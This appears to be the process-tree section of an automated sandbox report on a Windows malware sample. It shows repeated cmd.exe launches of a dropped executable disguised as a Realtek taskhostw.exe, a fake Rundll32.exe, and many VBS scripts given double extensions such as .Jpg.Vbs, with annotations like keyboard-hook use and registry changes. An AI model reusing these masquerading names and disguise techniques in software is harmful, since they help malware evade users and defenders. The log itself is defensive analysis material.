C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5548
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:8084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6312
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:7572
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2708
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7128
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7904
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\PrTecTor.exe1⤵PID:444
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1160
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6952
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4432 -ip 44321⤵PID:7040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6380
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4212
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:8148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6944
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7072
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7156
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4684
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6128
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:8160
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:8056
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵PID:2640
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7448
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5140
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2720
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5584
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3760
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3552
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1948
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:600
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7256
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7412
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1208
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Rundll32.exe1⤵PID:7500
-
C:\Rundll32.exeC:\Rundll32.exe2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Rundll32.exe1⤵PID:7652
-
C:\Rundll32.exeC:\Rundll32.exe2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Rundll32.exe1⤵PID:7680
-
C:\Rundll32.exeC:\Rundll32.exe2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5272
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7764
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3508
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6380
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:8020
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3644
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3668
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2676
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1752
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4112
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1140
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5760
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:8048
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7620
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7720
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7284
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5692
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7468
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6672
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:8068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1764
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6572
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3580
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5976
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵PID:7948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7780
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:8060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4752
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3676
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7756
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5628
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1984
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7368
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7552
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2392
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3668
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2944
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7872
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7140
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6388
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7180
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6592
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3484
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5488
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5780
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7404
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6372
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4128
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6300
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7296
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3892
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4396
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4788
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7948
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\Y.Htm.Vbs1⤵PID:228
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Y.Htm.Vbs"2⤵PID:2160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Y.Htm.Vbs1⤵PID:6128
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Y.Htm.Vbs"2⤵PID:7512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\ICMIDKPGGATHS.Url.Vbs1⤵PID:4536
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\ICMIDKPGGATHS.Url.Vbs"2⤵PID:2084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\ICMIDKPGGATHS.Url.Vbs1⤵PID:956
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\ICMIDKPGGATHS.Url.Vbs"2⤵PID:6864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\PJTOKRWNNHAOZFMDMFHUO.Mov.Vbs1⤵PID:7736
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\PJTOKRWNNHAOZFMDMFHUO.Mov.Vbs"2⤵PID:2680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\PJTOKRWNNHAOZFMDMFHUO.Mov.Vbs1⤵PID:7688
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\PJTOKRWNNHAOZFMDMFHUO.Mov.Vbs"2⤵PID:7280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6668
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3596
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\CWGCXE.Doc.Vbs1⤵PID:5876
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\CWGCXE.Doc.Vbs"2⤵PID:4852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\CWGCXE.Doc.Vbs1⤵PID:7768
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\CWGCXE.Doc.Vbs"2⤵PID:1656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\CWHCXE.Doc.Vbs1⤵PID:464
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\CWHCXE.Doc.Vbs"2⤵PID:4884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\CWHCXE.Doc.Vbs1⤵PID:5756
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\CWHCXE.Doc.Vbs"2⤵PID:6408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\UPZUQWCTTMGTELSJRKMZTSPYXIT.Mdb.Vbs1⤵PID:2740
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\UPZUQWCTTMGTELSJRKMZTSPYXIT.Mdb.Vbs"2⤵PID:4608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\UPZUQWCTTMGTELSJRKMZTSPYXIT.Mdb.Vbs1⤵PID:1896
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\UPZUQWCTTMGTELSJRKMZTSPYXIT.Mdb.Vbs"2⤵PID:5136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6428
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6388
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\FAKFBHNEEX.Jpg.Vbs1⤵PID:3564
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\FAKFBHNEEX.Jpg.Vbs"2⤵PID:8028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\FAKFBHNEEX.Jpg.Vbs1⤵PID:7392
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\FAKFBHNEEX.Jpg.Vbs"2⤵PID:3300
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵PID:7240
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\ZUE.Doc.Vbs1⤵PID:1652
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\ZUE.Doc.Vbs"2⤵PID:4504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\ZUE.Doc.Vbs1⤵PID:3176
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\ZUE.Doc.Vbs"2⤵PID:1984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\PJTOKRWNNHANZFMDLEGT.Mp3.Vbs1⤵PID:224
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\PJTOKRWNNHANZFMDLEGT.Mp3.Vbs"2⤵PID:6588
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\PJTOKRWNNHANZFMDLEGT.Mp3.Vbs1⤵PID:4556
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\PJTOKRWNNHANZFMDLEGT.Mp3.Vbs"2⤵PID:2972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6988
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7444
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AVFA.Bmp.Vbs1⤵PID:1200
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\AVFA.Bmp.Vbs"2⤵PID:4184
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\AVFA.Bmp.Vbs1⤵PID:2588
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\AVFA.Bmp.Vbs"2⤵PID:6988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AUE.Xls.Vbs1⤵PID:6820
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\AUE.Xls.Vbs"2⤵PID:8220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\AUE.Xls.Vbs1⤵PID:7340
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\AUE.Xls.Vbs"2⤵PID:7516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\EYIDZGLC.Jpg.Vbs1⤵PID:560
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\EYIDZGLC.Jpg.Vbs"2⤵PID:8664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\EYIDZGLC.Jpg.Vbs1⤵PID:6692
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\EYIDZGLC.Jpg.Vbs"2⤵PID:8724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AVFA.Bmp.Vbs1⤵PID:2012
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\AVFA.Bmp.Vbs"2⤵PID:8656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\AVFA.Bmp.Vbs1⤵PID:6900
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\AVFA.Bmp.Vbs"2⤵PID:8760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\ZTE.Doc.Vbs1⤵PID:5212
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\ZTE.Doc.Vbs"2⤵PID:9700
-
-
